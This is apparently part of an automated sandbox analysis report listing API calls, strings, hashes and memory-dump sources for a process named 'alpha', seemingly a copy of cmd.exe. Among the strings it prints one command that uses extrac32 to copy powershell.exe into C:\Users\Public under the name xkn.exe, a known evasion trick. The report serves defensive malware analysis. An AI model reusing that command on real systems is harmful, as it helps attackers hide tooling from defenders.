                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$iswspacewcschr
                                                                                                                    • String ID: )$=,;
                                                                                                                    • API String ID: 1959970872-2167043656
                                                                                                                    • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                    • Instruction ID: 72916209d4e65f0a94964b347f97071e0be2377ba7cae6a09aafa2dc1c91a318
                                                                                                                    • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                                                    • Instruction Fuzzy Hash: 11417F65E0825A85FB646F15E558379FAB0BF50FABFE45076CA8D421A0DF3CA441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                                                    • String ID: %04X-%04X$:
                                                                                                                    • API String ID: 930873262-1938371929
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 3249344982-2616576482
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$iswdigit
                                                                                                                    • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                    • API String ID: 2770779731-632268628
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192234081-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1673
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD168D
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1757
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD176E
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD1788
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF789BD14D6,?,?,?,00007FF789BCAA22,?,?,?,00007FF789BC847E), ref: 00007FF789BD179C
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Alloc$Size
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3586862581-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1313749407-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 920682188-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe , xrefs: 00007FF789BCE00B
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess_setjmp
                                                                                                                    • String ID: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 777023205-4044220184
                                                                                                                    • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                    • Instruction ID: 13b70ef18cf0117297ae03081c3968ee21bcb362160e95bebf3f6c53788de3a9
                                                                                                                    • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                    • Instruction Fuzzy Hash: 7851393090DA86CAF690AF22E845179FAB4BF84F66FF44435D54D427A1DE3EA841C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$iswspacewcschr
                                                                                                                    • String ID: )$=,;
                                                                                                                    • API String ID: 1959970872-2167043656
                                                                                                                    • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction ID: d03cb7889527400858b9b2eaf56293869ff79451347d70d63488c7fa10b4111f
                                                                                                                    • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                    • Instruction Fuzzy Hash: BE417964E0825B96FBA46F11E558379BEB0BF10FABFF45076C98D421A0DF3CA441C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                    • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                    • API String ID: 3625580822-2781220306
                                                                                                                    • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                    • Instruction ID: 4c6029e906d4730484052e80e0691112b97067f7d5ea310bf8e0653317e7df1d
                                                                                                                    • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                    • Instruction Fuzzy Hash: 69319221A0964A81EE18BF82A5001BDFB74FF45F96FA45134DD1D17795EE3CE489C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsspn
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3809306610-0
                                                                                                                    • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                    • Instruction ID: 049c15574a5048d04e121039e51e015066979a888249c3b868b2f123ddbafdc0
                                                                                                                    • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                    • Instruction Fuzzy Hash: 04B1B171A08B8A86EA50EF55E454279EBB0FB85F92FE48031DA4D47790DF7DE841C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$iswdigit$wcstol
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3841054028-0
                                                                                                                    • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                    • Instruction ID: efcfdabf847235ef2820f268d11a75a1feda3d49804b6f83ea031a395540308f
                                                                                                                    • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                    • Instruction Fuzzy Hash: 5F51F726E04A5A92E724AF1594101BDBEB5FF68F92BE4C235DE5D422D4EF3CE441C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE3687
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE36A6
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE36EB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE3703
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE3722
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1066134489-0
                                                                                                                    • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                    • Instruction ID: e6b314230b70dab50962866acacd50fd54758ca4f4de1fe54c0473a6cc575aa9
                                                                                                                    • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                    • Instruction Fuzzy Hash: 53519E21B0864A9BEA246F21D40457EEFB5FB54F96FA84535DE0A07790EF7CE441CA20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 850181435-0
                                                                                                                    • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                    • Instruction ID: 74c16cc54365d7afed68b7ae36681aa3d1bd35794cf881e2727f9001d35e8cd2
                                                                                                                    • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                    • Instruction Fuzzy Hash: E3419F32608BC9C9E7609F20D8442E9BBB0FB89F8AFA54425EA4D4BB58DF3CD545C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD3514
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD3522
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD3541
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD355E
                                                                                                                      • Part of subcall function 00007FF789BD36EC: _get_osfhandle.MSVCRT ref: 00007FF789BD3715
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD3770
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4057327938-0
                                                                                                                    • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                    • Instruction ID: 401c88bb2e8d679485544777b3b61c1f8c58f562366e7632a0ad40c46e1f55da
                                                                                                                    • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                    • Instruction Fuzzy Hash: E1313021A0CA4A86F7507F25A40507DFEB0FF89F86FE44139D90E42796DE2DE504C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
• API String ID: 411561164-4129271751
• Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
• Instruction ID: 23122a5cb2d335a7735743499607e02b8607d39f7e468d79c9e067c2f33d8768
• Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
• Instruction Fuzzy Hash: 96217120A0861BC1FA54BF66E454179EA75FF84F92FE09631DA1E472E5EE3CD444C620
Uniqueness
Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0212
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0228
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD023C
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0251
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
• Instruction ID: c025d23c53e007ed256a811c72444eda24190885ed1f94388be429216d833e85
• Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
• Instruction Fuzzy Hash: 04213E2190D68A87EA506F65E588238FEB0FF4AF57FB45134DA1F02694DE7DD444C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction ID: 50cfb6c9e41135a0df8cdc5ef6ba955a26b010c615876f438cb6c6979131e036
• Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction Fuzzy Hash: 1E116622605F498AEB00EF75E84416877B4F749B59F901A30EA6D47B54EF3CD1A4C350
Uniqueness
Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF789BD3584
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
